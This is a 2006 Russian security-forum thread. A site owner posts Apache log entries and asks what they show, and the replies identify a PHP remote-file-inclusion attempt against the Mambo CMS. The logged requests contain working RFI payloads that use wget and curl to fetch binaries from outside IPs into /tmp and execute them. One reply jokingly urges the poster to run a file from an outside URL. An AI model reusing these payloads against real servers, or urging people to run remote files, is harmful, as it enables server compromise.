Объясните логи апач сервера

Discussion in 'Безопасность и Анонимность' started by andre, 3 Apr 2006.

Thread Status:
Not open for further replies.
  1. andre

    andre New Member

    Joined:
    26 Mar 2006
    Messages:
    21
    Likes Received:
    4
    Reputations:
    2
    Обнаружил у себя в логах такие вот записи

    24.20.104.181 - - [03/Apr/2006:20:46:46 +0400] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 404 296

    24.20.104.181 - - [03/Apr/2006:20:46:48 +0400] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 200 42194

    24.20.104.181 - - [03/Apr/2006:20:46:50 +0400] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 404 302

    объсните что пытались сделать?
     
  2. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    пытались ломануть =)
     
  3. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    Пытались выполнить команды и залить шелл. Это php инклудинг!
     
  4. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    лол, самому сложно понять, что пытались сделать?
     
  5. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    пытались поломать твою мамбу с помощью php инклуда
    1 и 3 страница не существует, на второй не работает адреса загрузки
     
  6. fucker"ok

    fucker"ok Elder - Старейшина

    Joined:
    21 Nov 2004
    Messages:
    580
    Likes Received:
    279
    Reputations:
    91
    Это новая фишка в apache. Называется "вселенский разум". Теперь apache сам скачивает то что ему надо и откуда над.
    Это как-раз видно по логам, wget фигурирует.


    зы
    тебя похачили.
     
  7. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    пытались залить тебе сплойт
     
  8. virgoz

    virgoz Elder - Старейшина

    Joined:
    16 Sep 2004
    Messages:
    151
    Likes Received:
    28
    Reputations:
    15
    Помоги ребятам, запусти этот файлик _http://72.34.42.241/~dancing/bash :))
     
  9. Allen

    Allen Elder - Старейшина

    Joined:
    24 Oct 2005
    Messages:
    155
    Likes Received:
    14
    Reputations:
    -1
    У тебя мамба целая?
    А то её собирались ломнуть.
     
  10. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    сколько человек еще скажет, что его пытались ломануть?
    делаем ставки господа!
     
  11. andre

    andre New Member

    Joined:
    26 Mar 2006
    Messages:
    21
    Likes Received:
    4
    Reputations:
    2
    пасибо за разъяснения

    что такое мамба? эт типо движок на пхп или...., нет у меня его(или ее)...

    интересно кому я сдался, в логе еще парочка таких обращения и все к несуществующим папкам и файлам, они что на шару пытались найти скрипты...

    phpgroupware
    wordpress
    drupal
    /xmlrpc.php
    /xmlsrv/xmlrpc.php
    (ничего из этого у меня не стоит и не было никогда)
     
Thread Status:
Not open for further replies.